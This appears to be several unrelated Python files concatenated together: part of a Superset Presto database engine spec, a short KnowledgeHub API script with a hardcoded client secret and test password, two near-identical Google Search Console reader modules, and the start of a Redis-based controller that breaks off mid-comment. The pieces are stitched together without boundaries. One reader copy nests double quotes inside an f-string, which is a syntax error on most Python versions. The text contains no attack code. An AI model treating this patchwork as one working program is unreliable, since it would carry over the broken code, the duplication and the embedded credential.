""" cols = cols or [] presto_cols = cols if is_feature_enabled("PRESTO_EXPAND_DATA") and show_cols: dot_regex = r"\.(?=(?:[^\"]*\"[^\"]*\")*[^\"]*$)" presto_cols = [ col for col in presto_cols if not re.search(dot_regex, col["name"]) ] return super().select_star( database, table_name, engine, schema, limit, show_cols, indent, latest_partition, presto_cols, ) @classmethod def adjust_database_uri(cls, uri, selected_schema=None): database = uri.database if selected_schema and database: selected_schema = parse.quote(selected_schema, safe="") if "/" in database: database = database.split("/")[0] + "/" + selected_schema else: database += "/" + selected_schema uri.database = database return uri @classmethod def convert_dttm(cls, target_type: str, dttm: datetime) -> str: tt = target_type.upper() if tt == "DATE": return "from_iso8601_date('{}')".format(dttm.isoformat()[:10]) if tt == "TIMESTAMP": return "from_iso8601_timestamp('{}')".format(dttm.isoformat()) return "'{}'".format(dttm.strftime("%Y-%m-%d %H:%M:%S")) @classmethod def epoch_to_dttm(cls) -> str: return "from_unixtime({col})" @classmethod def get_all_datasource_names( cls, db, datasource_type: str ) -> List[utils.DatasourceName]: datasource_df = db.get_df( "SELECT table_schema, table_name FROM INFORMATION_SCHEMA.{}S " "ORDER BY concat(table_schema, '.', table_name)".format( datasource_type.upper() ), None, ) datasource_names: List[utils.DatasourceName] = [] for unused, row in datasource_df.iterrows(): datasource_names.append( utils.DatasourceName( schema=row["table_schema"], table=row["table_name"] ) ) return datasource_names @classmethod def _build_column_hierarchy( cls, columns: List[dict], parent_column_types: List[str], column_hierarchy: dict ) -> None: """ Build a graph where the root node represents a column whose data type is in parent_column_types. 
A node's children represent that column's nested fields :param columns: list of columns :param parent_column_types: list of data types that decide what columns can be root nodes :param column_hierarchy: dictionary representing the graph """ if len(columns) == 0: return root = columns.pop(0) root_info = {"type": root["type"], "children": []} column_hierarchy[root["name"]] = root_info while columns: column = columns[0] # If the column name does not start with the root's name, # then this column is not a nested field if not column["name"].startswith(f"{root['name']}."): break # If the column's data type is one of the parent types, # then this column may have nested fields if str(column["type"]) in parent_column_types: cls._build_column_hierarchy( columns, parent_column_types, column_hierarchy ) root_info["children"].append(column["name"]) continue else: # The column is a nested field root_info["children"].append(column["name"]) columns.pop(0) @classmethod def _create_row_and_array_hierarchy( cls, selected_columns: List[dict] ) -> Tuple[dict, dict, List[dict]]: """ Build graphs where the root node represents a row or array and its children are that column's nested fields :param selected_columns: columns selected in a query :return: graph representing a row, graph representing an array, and a list of all the nested fields """ row_column_hierarchy: OrderedDict = OrderedDict() array_column_hierarchy: OrderedDict = OrderedDict() expanded_columns: List[dict] = [] for column in selected_columns: if column["type"].startswith("ROW"): parsed_row_columns: List[dict] = [] cls._parse_structural_column( column["name"], column["type"].lower(), parsed_row_columns ) expanded_columns = expanded_columns + parsed_row_columns[1:] filtered_row_columns, array_columns = cls._filter_out_array_nested_cols( parsed_row_columns ) cls._build_column_hierarchy( filtered_row_columns, ["ROW"], row_column_hierarchy ) cls._build_column_hierarchy( array_columns, ["ROW", "ARRAY"], array_column_hierarchy ) elif column["type"].startswith("ARRAY"): parsed_array_columns: List[dict] = [] cls._parse_structural_column( column["name"], column["type"].lower(), parsed_array_columns ) expanded_columns = expanded_columns + parsed_array_columns[1:] cls._build_column_hierarchy( parsed_array_columns, ["ROW", "ARRAY"], array_column_hierarchy ) return row_column_hierarchy, array_column_hierarchy, expanded_columns @classmethod def _create_empty_row_of_data(cls, columns: List[dict]) -> dict: """ Create an empty row of data :param columns: list of columns :return: dictionary representing an empty row of data """ return {column["name"]: "" for column in columns} @classmethod def _expand_row_data(cls, datum: dict, column: str, column_hierarchy: dict) -> None: """ Separate out nested fields and its value in a row of data :param datum: row of data :param column: row column name :param column_hierarchy: dictionary tracking structural columns and its nested fields """ if column in datum: row_data = datum[column] row_children = column_hierarchy[column]["children"] if row_data and len(row_data) != len(row_children): raise Exception( "The number of data values and number of nested" "fields are not equal" ) elif row_data: for index, data_value in enumerate(row_data): datum[row_children[index]] = data_value else: for row_child in row_children: datum[row_child] = "" @classmethod def _split_array_columns_by_process_state( cls, array_columns: List[str], array_column_hierarchy: dict, datum: dict ) -> Tuple[List[str], Set[str]]: """ Take a list of array columns and 
split them according to whether or not we are ready to process them from a data set :param array_columns: list of array columns :param array_column_hierarchy: graph representing array columns :param datum: row of data :return: list of array columns ready to be processed and set of array columns not ready to be processed """ array_columns_to_process = [] unprocessed_array_columns = set() child_array = None for array_column in array_columns: if array_column in datum: array_columns_to_process.append(array_column) elif str(array_column_hierarchy[array_column]["type"]) == "ARRAY": child_array = array_column unprocessed_array_columns.add(child_array) elif child_array and array_column.startswith(child_array): unprocessed_array_columns.add(array_column) else: # array without any data array_columns_to_process.append(array_column) datum[array_column] = [] return array_columns_to_process, unprocessed_array_columns @classmethod def _convert_data_list_to_array_data_dict( cls, data: List[dict], array_columns_to_process: List[str] ) -> dict: """ Pull out array data from rows of data into a dictionary where the key represents the index in the data list and the value is the array data values Example: data = [ {'ColumnA': [1, 2], 'ColumnB': 3}, {'ColumnA': [11, 22], 'ColumnB': 3} ] data dictionary = { 0: [{'ColumnA': [1, 2]], 1: [{'ColumnA': [11, 22]] } :param data: rows of data :param array_columns_to_process: array columns we want to pull out :return: data dictionary """ array_data_dict = {} for data_index, datum in enumerate(data): all_array_datum = {} for array_column in array_columns_to_process: all_array_datum[array_column] = datum[array_column] array_data_dict[data_index] = [all_array_datum] return array_data_dict @classmethod def _process_array_data( cls, data: List[dict], all_columns: List[dict], array_column_hierarchy: dict ) -> dict: """ Pull out array data that is ready to be processed into a dictionary. The key refers to the index in the original data set. The value is a list of data values. Initially this list will contain just one value, the row of data that corresponds to the index in the original data set. As we process arrays, we will pull out array values into separate rows and append them to the list of data values. Example: Original data set = [ {'ColumnA': [1, 2], 'ColumnB': [3]}, {'ColumnA': [11, 22], 'ColumnB': [33]} ] all_array_data (initially) = { 0: [{'ColumnA': [1, 2], 'ColumnB': [3}], 1: [{'ColumnA': [11, 22], 'ColumnB': [33]}] } all_array_data (after processing) = { 0: [ {'ColumnA': 1, 'ColumnB': 3}, {'ColumnA': 2, 'ColumnB': ''}, ], 1: [ {'ColumnA': 11, 'ColumnB': 33}, {'ColumnA': 22, 'ColumnB': ''}, ], } :param data: rows of data :param all_columns: list of columns :param array_column_hierarchy: graph representing array columns :return: dictionary representing processed array data """ array_columns = list(array_column_hierarchy.keys()) # Determine what columns are ready to be processed. This is necessary for # array columns that contain rows with nested arrays. We first process # the outer arrays before processing inner arrays. array_columns_to_process, unprocessed_array_columns = cls._split_array_columns_by_process_state( array_columns, array_column_hierarchy, data[0] ) # Pull out array data that is ready to be processed into a dictionary. 
all_array_data = cls._convert_data_list_to_array_data_dict( data, array_columns_to_process ) for original_data_index, expanded_array_data in all_array_data.items(): for array_column in array_columns: if array_column in unprocessed_array_columns: continue # Expand array values that are rows if str(array_column_hierarchy[array_column]["type"]) == "ROW": for array_value in expanded_array_data: cls._expand_row_data( array_value, array_column, array_column_hierarchy ) continue array_data = expanded_array_data[0][array_column] array_children = array_column_hierarchy[array_column] # This is an empty array of primitive data type if not array_data and not array_children["children"]: continue # Pull out complex array values into its own row of data elif array_data and array_children["children"]: for array_index, data_value in enumerate(array_data): if array_index >= len(expanded_array_data): empty_data = cls._create_empty_row_of_data(all_columns) expanded_array_data.append(empty_data) for index, datum_value in enumerate(data_value): array_child = array_children["children"][index] expanded_array_data[array_index][array_child] = datum_value # Pull out primitive array values into its own row of data elif array_data: for array_index, data_value in enumerate(array_data): if array_index >= len(expanded_array_data): empty_data = cls._create_empty_row_of_data(all_columns) expanded_array_data.append(empty_data) expanded_array_data[array_index][array_column] = data_value # This is an empty array with nested fields else: for index, array_child in enumerate(array_children["children"]): for array_value in expanded_array_data: array_value[array_child] = "" return all_array_data @classmethod def _consolidate_array_data_into_data( cls, data: List[dict], array_data: dict ) -> None: """ Consolidate data given a list representing rows of data and a dictionary representing expanded array data Example: Original data set = [ {'ColumnA': [1, 2], 'ColumnB': [3]}, {'ColumnA': [11, 22], 'ColumnB': [33]} ] array_data = { 0: [ {'ColumnA': 1, 'ColumnB': 3}, {'ColumnA': 2, 'ColumnB': ''}, ], 1: [ {'ColumnA': 11, 'ColumnB': 33}, {'ColumnA': 22, 'ColumnB': ''}, ], } Final data set = [ {'ColumnA': 1, 'ColumnB': 3}, {'ColumnA': 2, 'ColumnB': ''}, {'ColumnA': 11, 'ColumnB': 33}, {'ColumnA': 22, 'ColumnB': ''}, ] :param data: list representing rows of data :param array_data: dictionary representing expanded array data :return: list where data and array_data are combined """ data_index = 0 original_data_index = 0 while data_index < len(data): data[data_index].update(array_data[original_data_index][0]) array_data[original_data_index].pop(0) data[data_index + 1 : data_index + 1] = array_data[original_data_index] data_index = data_index + len(array_data[original_data_index]) + 1 original_data_index = original_data_index + 1 @classmethod def _remove_processed_array_columns( cls, unprocessed_array_columns: Set[str], array_column_hierarchy: dict ) -> None: """ Remove keys representing array columns that have already been processed :param unprocessed_array_columns: list of unprocessed array columns :param array_column_hierarchy: graph representing array columns """ array_columns = list(array_column_hierarchy.keys()) for array_column in array_columns: if array_column in unprocessed_array_columns: continue else: del array_column_hierarchy[array_column] @classmethod def expand_data( cls, columns: List[dict], data: List[dict] ) -> Tuple[List[dict], List[dict], List[dict]]: """ We do not immediately display rows and arrays clearly in the data 
grid. This method separates out nested fields and data values to help clearly display structural columns. Example: ColumnA is a row(nested_obj varchar) and ColumnB is an array(int) Original data set = [ {'ColumnA': ['a1'], 'ColumnB': [1, 2]}, {'ColumnA': ['a2'], 'ColumnB': [3, 4]}, ] Expanded data set = [ {'ColumnA': ['a1'], 'ColumnA.nested_obj': 'a1', 'ColumnB': 1}, {'ColumnA': '', 'ColumnA.nested_obj': '', 'ColumnB': 2}, {'ColumnA': ['a2'], 'ColumnA.nested_obj': 'a2', 'ColumnB': 3}, {'ColumnA': '', 'ColumnA.nested_obj': '', 'ColumnB': 4}, ] :param columns: columns selected in the query :param data: original data set :return: list of all columns(selected columns and their nested fields), expanded data set, listed of nested fields """ if not is_feature_enabled("PRESTO_EXPAND_DATA"): return columns, data, [] all_columns: List[dict] = [] # Get the list of all columns (selected fields and their nested fields) for column in columns: if column["type"].startswith("ARRAY") or column["type"].startswith("ROW"): cls._parse_structural_column( column["name"], column["type"].lower(), all_columns ) else: all_columns.append(column) # Build graphs where the root node is a row or array and its children are that # column's nested fields row_column_hierarchy, array_column_hierarchy, expanded_columns = cls._create_row_and_array_hierarchy( columns ) # Pull out a row's nested fields and their values into separate columns ordered_row_columns = row_column_hierarchy.keys() for datum in data: for row_column in ordered_row_columns: cls._expand_row_data(datum, row_column, row_column_hierarchy) while array_column_hierarchy: array_columns = list(array_column_hierarchy.keys()) # Determine what columns are ready to be processed. array_columns_to_process, unprocessed_array_columns = cls._split_array_columns_by_process_state( array_columns, array_column_hierarchy, data[0] ) all_array_data = cls._process_array_data( data, all_columns, array_column_hierarchy ) # Consolidate the original data set and the expanded array data cls._consolidate_array_data_into_data(data, all_array_data) # Remove processed array columns from the graph cls._remove_processed_array_columns( unprocessed_array_columns, array_column_hierarchy ) return all_columns, data, expanded_columns @classmethod def extra_table_metadata( cls, database, table_name: str, schema_name: str ) -> Dict[str, Any]: indexes = database.get_indexes(table_name, schema_name) if not indexes: return {} cols = indexes[0].get("column_names", []) full_table_name = table_name if schema_name and "." not in table_name: full_table_name = "{}.{}".format(schema_name, table_name) pql = cls._partition_query(full_table_name, database) col_names, latest_parts = cls.latest_partition( table_name, schema_name, database, show_first=True ) latest_parts = latest_parts or tuple([None] * len(col_names)) return { "partitions": { "cols": cols, "latest": dict(zip(col_names, latest_parts)), "partitionQuery": pql, } } @classmethod def handle_cursor(cls, cursor, query, session): """Updates progress information""" query_id = query.id logging.info(f"Query {query_id}: Polling the cursor for progress") polled = cursor.poll() # poll returns dict -- JSON status information or ``None`` # if the query is done # https://github.com/dropbox/PyHive/blob/ # b34bdbf51378b3979eaf5eca9e956f06ddc36ca0/pyhive/presto.py#L178 while polled: # Update the object and wait for the kill signal. 
stats = polled.get("stats", {}) query = session.query(type(query)).filter_by(id=query_id).one() if query.status in [QueryStatus.STOPPED, QueryStatus.TIMED_OUT]: cursor.cancel() break if stats: state = stats.get("state") # if already finished, then stop polling if state == "FINISHED": break completed_splits = float(stats.get("completedSplits")) total_splits = float(stats.get("totalSplits")) if total_splits and completed_splits: progress = 100 * (completed_splits / total_splits) logging.info( "Query {} progress: {} / {} " "splits".format(query_id, completed_splits, total_splits) ) if progress > query.progress: query.progress = progress session.commit() time.sleep(1) logging.info(f"Query {query_id}: Polling the cursor for progress") polled = cursor.poll() @classmethod def _extract_error_message(cls, e): if ( hasattr(e, "orig") and type(e.orig).__name__ == "DatabaseError" and isinstance(e.orig[0], dict) ): error_dict = e.orig[0] return "{} at {}: {}".format( error_dict.get("errorName"), error_dict.get("errorLocation"), error_dict.get("message"), ) if ( type(e).__name__ == "DatabaseError" and hasattr(e, "args") and len(e.args) > 0 ): error_dict = e.args[0] return error_dict.get("message") return utils.error_msg_from_exception(e) @classmethod def _partition_query( cls, table_name, database, limit=0, order_by=None, filters=None ): """Returns a partition query :param table_name: the name of the table to get partitions from :type table_name: str :param limit: the number of partitions to be returned :type limit: int :param order_by: a list of tuples of field name and a boolean that determines if that field should be sorted in descending order :type order_by: list of (str, bool) tuples :param filters: dict of field name and filter value combinations """ limit_clause = "LIMIT {}".format(limit) if limit else "" order_by_clause = "" if order_by: l = [] # noqa: E741 for field, desc in order_by: l.append(field + " DESC" if desc else "") order_by_clause = "ORDER BY " + ", ".join(l) where_clause = "" if filters: l = [] # noqa: E741 for field, value in filters.items(): l.append(f"{field} = '{value}'") where_clause = "WHERE " + " AND ".join(l) presto_version = database.get_extra().get("version") # Partition select syntax changed in v0.199, so check here. # Default to the new syntax if version is unset. 
partition_select_clause = ( f'SELECT * FROM "{table_name}$partitions"' if not presto_version or StrictVersion(presto_version) >= StrictVersion("0.199") else f"SHOW PARTITIONS FROM {table_name}" ) sql = textwrap.dedent( f"""\ {partition_select_clause} {where_clause} {order_by_clause} {limit_clause} """ ) return sql @classmethod def where_latest_partition( cls, table_name: str, schema: str, database, query: Select, columns: Optional[List] = None, ) -> Optional[Select]: try: col_names, values = cls.latest_partition( table_name, schema, database, show_first=True ) except Exception: # table is not partitioned return None if values is None: return None column_names = {column.get("name") for column in columns or []} for col_name, value in zip(col_names, values): if col_name in column_names: query = query.where(Column(col_name) == value) return query @classmethod def _latest_partition_from_df(cls, df) -> Optional[List[str]]: if not df.empty: return df.to_records(index=False)[0].item() return None @classmethod def latest_partition( cls, table_name: str, schema: str, database, show_first: bool = False ): """Returns col name and the latest (max) partition value for a table :param table_name: the name of the table :param schema: schema / database / namespace :param database: database query will be run against :type database: models.Database :param show_first: displays the value for the first partitioning key if there are many partitioning keys :type show_first: bool >>> latest_partition('foo_table') (['ds'], ('2018-01-01',)) """ indexes = database.get_indexes(table_name, schema) if len(indexes[0]["column_names"]) < 1: raise SupersetTemplateException( "The table should have one partitioned field" ) elif not show_first and len(indexes[0]["column_names"]) > 1: raise SupersetTemplateException( "The table should have a single partitioned field " "to use this function. You may want to use " "`presto.latest_sub_partition`" ) column_names = indexes[0]["column_names"] part_fields = [(column_name, True) for column_name in column_names] sql = cls._partition_query(table_name, database, 1, part_fields) df = database.get_df(sql, schema) return column_names, cls._latest_partition_from_df(df) @classmethod def latest_sub_partition(cls, table_name, schema, database, **kwargs): """Returns the latest (max) partition value for a table A filtering criteria should be passed for all fields that are partitioned except for the field to be returned. For example, if a table is partitioned by (``ds``, ``event_type`` and ``event_category``) and you want the latest ``ds``, you'll want to provide a filter as keyword arguments for both ``event_type`` and ``event_category`` as in ``latest_sub_partition('my_table', event_category='page', event_type='click')`` :param table_name: the name of the table, can be just the table name or a fully qualified table name as ``schema_name.table_name`` :type table_name: str :param schema: schema / database / namespace :type schema: str :param database: database query will be run against :type database: models.Database :param kwargs: keyword arguments define the filtering criteria on the partition list. There can be many of these. 
        :type kwargs: str

        >>> latest_sub_partition('sub_partition_table', event_type='click')
        '2018-01-01'
        """
        indexes = database.get_indexes(table_name, schema)
        part_fields = indexes[0]["column_names"]
        for k in kwargs.keys():
            if k not in part_fields:
                msg = f"Field [{k}] is not part of the partitioning key"
                raise SupersetTemplateException(msg)
        if len(kwargs.keys()) != len(part_fields) - 1:
            msg = (
                "A filter needs to be specified for {} out of the " "{} fields."
            ).format(len(part_fields) - 1, len(part_fields))
            raise SupersetTemplateException(msg)
        for field in part_fields:
            if field not in kwargs.keys():
                field_to_return = field

        sql = cls._partition_query(
            table_name, database, 1, [(field_to_return, True)], kwargs
        )
        df = database.get_df(sql, schema)
        if df.empty:
            return ""
        return df.to_dict()[field_to_return][0]
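# Illustrative usage sketch (not part of the engine spec above). It shows how
# expand_data() is intended to be called, using the same shapes as its
# docstring example; the exact type strings and the helper name below are
# assumptions. Note that expand_data() only expands nested columns when the
# PRESTO_EXPAND_DATA feature flag is enabled in a running Superset app;
# otherwise it returns its inputs unchanged.
def _example_expand_data():
    # Hypothetical helper, never called by Superset itself.
    columns = [
        {"name": "ColumnA", "type": "ROW(nested_obj VARCHAR)"},
        {"name": "ColumnB", "type": "ARRAY(BIGINT)"},
    ]
    data = [
        {"ColumnA": ["a1"], "ColumnB": [1, 2]},
        {"ColumnA": ["a2"], "ColumnB": [3, 4]},
    ]
    # Returns (selected plus nested columns, one row per array element, and
    # the list of nested "expanded" columns).
    return PrestoEngineSpec.expand_data(columns, data)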
from knowledgehub.api import KnowledgeHubAPI api = KnowledgeHubAPI(server='DEV', client_secret='3db5a6d7-4694-48a4-8a2e-e9c30d78f9ab') api.login('tester', 'tester') compoundSmile = api.ChemicalService().getSMILESByName('omeprazole') print(f'Found SMILES {compoundSmile[0]} for {"omeprazole"}') similar_compounds = api.SimilarityService().get(compoundSmile) print(f'similar compounds:{similar_compounds}')
""" Google Search Console API """ import logging import pickle from socket import timeout from googleapiclient.discovery import build from googleapiclient.errors import HttpError from oauth2client.client import OAuth2WebServerFlow from turbo_stream import ReaderInterface, write_file, write_file_to_s3 from turbo_stream.utils.date_handlers import date_range from turbo_stream.utils.request_handlers import request_handler, retry_handler logging.basicConfig( format="%(asctime)s %(name)-12s %(levelname)-8s %(message)s", level=logging.INFO ) class GoogleSearchConsoleReader(ReaderInterface): """ Google Search Console API Reader """ def __init__(self, configuration: dict, credentials: (dict, str), **kwargs): super().__init__(configuration, credentials) self.scopes = kwargs.get( "scopes", ( "https://www.googleapis.com/auth/webmasters.readonly", "https://www.googleapis.com/auth/webmasters", ), ) self.discovery_uri = kwargs.get( "discovery_uri", ("https://www.googleapis.com/discovery/v1/apis/customsearch/v1/rest"), ) self.oauth_scope = kwargs.get( "oath_scope", "https://www.googleapis.com/auth/webmasters.readonly" ) self.redirect_uri = kwargs.get("redirect_uri", "urn:ietf:wg:oauth:2.0:oob") def generate_authentication( self, auth_file_location="gsc_credentials.pickle" ) -> None: """ A user friendly method to generate a .pickle file for future authentication. For the first time, you would need to log in with your web browser based on this web authentication flow. After that, it will save your credentials in a pickle file. Every subsequent time you run the script, it will use the “pickled” credentials stored in credentials.pickle to build the connection to Search Console. """ flow = OAuth2WebServerFlow( self._credentials["installed"].get("client_id"), self._credentials["installed"].get("client_secret"), self.oauth_scope, self.redirect_uri, ) authorize_url = flow.step1_get_authorize_url() logging.info(f"Go to the following link in your browser: {authorize_url}") code = input("Enter verification code: ").strip() credentials = flow.step2_exchange(code) pickle.dump(credentials, open(auth_file_location, "wb")) def _get_service(self) -> build: """ Makes use of the .pickle cred file to establish a webmaster connection. """ with open(self._credentials, "rb") as _file: credentials = pickle.load(_file) return build( "searchconsole", "v1", credentials=credentials, cache_discovery=False ) @request_handler(wait=1, backoff_factor=0.5) @retry_handler( exceptions=(timeout, HttpError), total_tries=5, initial_wait=60, backoff_factor=5, ) def _query_handler(self, service, request, site_url): """ Run the API request that consumes a request payload and site url. This separates the request with the request handler from the rest of the logic. """ return service.searchanalytics().query(siteUrl=site_url, body=request).execute() def run_query(self): """ Consumes a .yaml config file and loops through the date and url to return relevant data from GSC API. """ service: build = self._get_service() start_date: str = self._configuration.get("start_date") end_date: str = self._configuration.get("end_date") dimensions: list = self._configuration.get("dimensions") logging.info( f"Gathering data between given dates {start_date} and {end_date}. " f"Querying for Site Url: {self._configuration.get("site_url")}." 
) dimension_data_set = {} # split request by date to reduce 504 errors for dimension in dimensions: for date in date_range(start_date=start_date, end_date=end_date): logging.info(f"Querying at date: {date} for dimension: {dimension}.") # run until none is returned or there is no more data in rows row_index = 0 while True: dim_query_set = list(dict.fromkeys(["date", dimension])) response = self._query_handler( service=service, request={ "startDate": date, "endDate": date, "dimensions": dim_query_set, "metrics": self._configuration.get("metrics"), "type": self._configuration.get("type"), "rowLimit": self._configuration.get("row_limit", 25000), "startRow": row_index * self._configuration.get("row_limit", 25000), "aggregationType": self._configuration.get( "aggregation_type", "auto" ), "dimensionFilterGroups": self._configuration.get( "dimension_filter_groups", [] ), "dataState": self._configuration.get("data_state", "final"), }, site_url=self._configuration.get("site_url"), ) if response is None: logging.info("Response is None, exiting process...") break if "rows" not in response: logging.info("No more data in given row, moving on....") break # added additional data that the api does not provide for row in response["rows"]: dataset = { "site_url": self._configuration.get("site_url"), "search_type": self._configuration.get("search_type"), } # get dimension data keys and values dataset.update( dict( zip( dim_query_set, row.get("keys", []), ) ) ) # get metrics data for metric in self._configuration.get("metrics", []): dataset[metric] = row.get(metric) if dimension not in dimension_data_set: dimension_data_set[dimension] = [] dimension_data_set[dimension].append(dataset) row_index += 1 self._append_data_set(dimension_data_set) logging.info(f"{self.__class__.__name__} process complete!") return self._data_set def write_date_to_local(self, file_location): """ GSC returns queries for each dimension respectively. The response data is response_dataset = { "date": ["dimension response data"], "page": ["dimension response data"], "query": ["dimension response data"] } So each dimension will be written as its own dataset to local. :param file_location: Local file location. """ for dimension, dimension_dataset in self._data_set[0].items(): file_split = file_location.split(".") filepath = f"{file_split[0]}_{dimension}.{file_split[-1]}" logging.info(f"Writing {dimension} data to local path: {filepath}.") write_file(data=dimension_dataset, file_location=filepath) def write_partition_data_to_s3( self, bucket: str, path: str, partition: str, fmt="json" ): """ Writes a file to s3, partitioned by a given field in the dataset. Json objects will be serialised before writing. This works best with date fields where the use-case would be to reduce duplicates stored in s3. Specifying the file type in the name will serialise the data.Supported formats are Json, CSV, Parquet and Text. :param bucket: The bucket to write to in s3. :param path: The path in the bucket where the partition file will be written. :param partition: The field name in the dataset what will become the partition. :param fmt: The format to write in. :return: The partitioned dataset object """ for dimension, dimension_dataset in self._data_set[0].items(): partition_dataset = self._partition_dataset( partition=partition, dataset=dimension_dataset ) for partition_name, partition_data in partition_dataset.items(): write_file_to_s3( bucket=bucket, key=f"{path}/{partition_name}_{dimension}.{fmt}", data=partition_data, )
""" Google Search Console API """ import logging import pickle from socket import timeout from googleapiclient.discovery import build from googleapiclient.errors import HttpError from oauth2client.client import OAuth2WebServerFlow from turbo_stream import ReaderInterface, write_file, write_file_to_s3 from turbo_stream.utils.date_handlers import date_range from turbo_stream.utils.request_handlers import request_handler, retry_handler logging.basicConfig( format="%(asctime)s %(name)-12s %(levelname)-8s %(message)s", level=logging.INFO ) class GoogleSearchConsoleReader(ReaderInterface): """ Google Search Console API Reader """ def __init__(self, configuration: dict, credentials: (dict, str), **kwargs): super().__init__(configuration, credentials) self.scopes = kwargs.get( "scopes", ( "https://www.googleapis.com/auth/webmasters.readonly", "https://www.googleapis.com/auth/webmasters", ), ) self.discovery_uri = kwargs.get( "discovery_uri", ("https://www.googleapis.com/discovery/v1/apis/customsearch/v1/rest"), ) self.oauth_scope = kwargs.get( "oath_scope", "https://www.googleapis.com/auth/webmasters.readonly" ) self.redirect_uri = kwargs.get("redirect_uri", "urn:ietf:wg:oauth:2.0:oob") def generate_authentication( self, auth_file_location="gsc_credentials.pickle" ) -> None: """ A user friendly method to generate a .pickle file for future authentication. For the first time, you would need to log in with your web browser based on this web authentication flow. After that, it will save your credentials in a pickle file. Every subsequent time you run the script, it will use the “pickled” credentials stored in credentials.pickle to build the connection to Search Console. """ flow = OAuth2WebServerFlow( self._credentials["installed"].get("client_id"), self._credentials["installed"].get("client_secret"), self.oauth_scope, self.redirect_uri, ) authorize_url = flow.step1_get_authorize_url() logging.info(f"Go to the following link in your browser: {authorize_url}") code = input("Enter verification code: ").strip() credentials = flow.step2_exchange(code) pickle.dump(credentials, open(auth_file_location, "wb")) def _get_service(self) -> build: """ Makes use of the .pickle cred file to establish a webmaster connection. """ with open(self._credentials, "rb") as _file: credentials = pickle.load(_file) return build( "searchconsole", "v1", credentials=credentials, cache_discovery=False ) @request_handler(wait=1, backoff_factor=0.5) @retry_handler( exceptions=(timeout, HttpError), total_tries=5, initial_wait=60, backoff_factor=5, ) def _query_handler(self, service, request, site_url): """ Run the API request that consumes a request payload and site url. This separates the request with the request handler from the rest of the logic. """ return service.searchanalytics().query(siteUrl=site_url, body=request).execute() def run_query(self): """ Consumes a .yaml config file and loops through the date and url to return relevant data from GSC API. """ service: build = self._get_service() start_date: str = self._configuration.get("start_date") end_date: str = self._configuration.get("end_date") dimensions: list = self._configuration.get("dimensions") logging.info( f"Gathering data between given dates {start_date} and {end_date}. " f"Querying for Site Url: {self._configuration.get('site_url')}." 
) dimension_data_set = {} # split request by date to reduce 504 errors for dimension in dimensions: for date in date_range(start_date=start_date, end_date=end_date): logging.info(f"Querying at date: {date} for dimension: {dimension}.") # run until none is returned or there is no more data in rows row_index = 0 while True: dim_query_set = list(dict.fromkeys(["date", dimension])) response = self._query_handler( service=service, request={ "startDate": date, "endDate": date, "dimensions": dim_query_set, "metrics": self._configuration.get("metrics"), "type": self._configuration.get("type"), "rowLimit": self._configuration.get("row_limit", 25000), "startRow": row_index * self._configuration.get("row_limit", 25000), "aggregationType": self._configuration.get( "aggregation_type", "auto" ), "dimensionFilterGroups": self._configuration.get( "dimension_filter_groups", [] ), "dataState": self._configuration.get("data_state", "final"), }, site_url=self._configuration.get("site_url"), ) if response is None: logging.info("Response is None, exiting process...") break if "rows" not in response: logging.info("No more data in given row, moving on....") break # added additional data that the api does not provide for row in response["rows"]: dataset = { "site_url": self._configuration.get("site_url"), "search_type": self._configuration.get("search_type"), } # get dimension data keys and values dataset.update( dict( zip( dim_query_set, row.get("keys", []), ) ) ) # get metrics data for metric in self._configuration.get("metrics", []): dataset[metric] = row.get(metric) if dimension not in dimension_data_set: dimension_data_set[dimension] = [] dimension_data_set[dimension].append(dataset) row_index += 1 self._append_data_set(dimension_data_set) logging.info(f"{self.__class__.__name__} process complete!") return self._data_set def write_date_to_local(self, file_location): """ GSC returns queries for each dimension respectively. The response data is response_dataset = { "date": ["dimension response data"], "page": ["dimension response data"], "query": ["dimension response data"] } So each dimension will be written as its own dataset to local. :param file_location: Local file location. """ for dimension, dimension_dataset in self._data_set[0].items(): file_split = file_location.split(".") filepath = f"{file_split[0]}_{dimension}.{file_split[-1]}" logging.info(f"Writing {dimension} data to local path: {filepath}.") write_file(data=dimension_dataset, file_location=filepath) def write_partition_data_to_s3( self, bucket: str, path: str, partition: str, fmt="json" ): """ Writes a file to s3, partitioned by a given field in the dataset. Json objects will be serialised before writing. This works best with date fields where the use-case would be to reduce duplicates stored in s3. Specifying the file type in the name will serialise the data.Supported formats are Json, CSV, Parquet and Text. :param bucket: The bucket to write to in s3. :param path: The path in the bucket where the partition file will be written. :param partition: The field name in the dataset what will become the partition. :param fmt: The format to write in. :return: The partitioned dataset object """ for dimension, dimension_dataset in self._data_set[0].items(): partition_dataset = self._partition_dataset( partition=partition, dataset=dimension_dataset ) for partition_name, partition_data in partition_dataset.items(): write_file_to_s3( bucket=bucket, key=f"{path}/{partition_name}_{dimension}.{fmt}", data=partition_data, )
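# Illustrative usage sketch (not part of the reader above). Everything below
# is a hypothetical example: the site URL, dates, bucket and path are
# placeholders, and the configuration keys simply mirror what run_query()
# reads. A credentials pickle is assumed to exist already, for instance one
# produced by generate_authentication().
if __name__ == "__main__":
    example_config = {
        "site_url": "https://www.example.com/",
        "start_date": "2021-01-01",
        "end_date": "2021-01-07",
        "dimensions": ["page", "query"],
        "metrics": ["clicks", "impressions", "ctr", "position"],
        "type": "web",
        "search_type": "web",
        "row_limit": 25000,
    }
    reader = GoogleSearchConsoleReader(
        configuration=example_config, credentials="gsc_credentials.pickle"
    )
    reader.run_query()
    # Each dimension becomes its own set of files, partitioned by the "date"
    # field that every response row carries.
    reader.write_partition_data_to_s3(
        bucket="example-bucket", path="gsc", partition="date", fmt="json"
    )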
import base64 import subprocess import json from pathlib import Path import random import requests import redis from redis import Redis import time import threading import collections from threading import Lock from threading import Event from queue import Queue # Mine import exceptions import abstractions import logging import os import common class LocalController: def __init__(self, redis_server='redis-server', redis_port=6379): # Set Up Redis database connection self.db = Redis(host=redis_server, port=redis_port) try: self.db.ping() except redis.exceptions.ConnectionError as e: print(f"Error connecting to Redis server @ {redis_server}. Is it started?") print(e) exit(8) # Get basic information from Redis ## Note: might not be available self.model_names = [w.decode() for w in self.db.smembers(f"{common.MODEL_NAME_KEY}")] # Set up structures self.models_by_name = {} # Set up lists of models and workers self.workers_by_url = {} self.model_placements = common.ModelPlacements() ## Set up locks for models and workers self.workers_lock = threading.RLock() self.model_lock = threading.RLock() # Events for when models are available # TODO: purge this half-assed approach self.model_available_event = { model_name : Event() for model_name in self.model_names } # Subscribe to future updates to models and workers pubsub = self.db.pubsub() pubsub.subscribe(**{f'{common.KEYSPACE_PREFIX}{common.WORKER_URL_KEY}': self.updateWorkerList}) pubsub.psubscribe(**{f'{common.KEYSPACE_PREFIX}{common.MODEL_PLACEMENT_PREFIX}*': self.updateModelPlacement}) # Note: There is an option sleep_time argument to 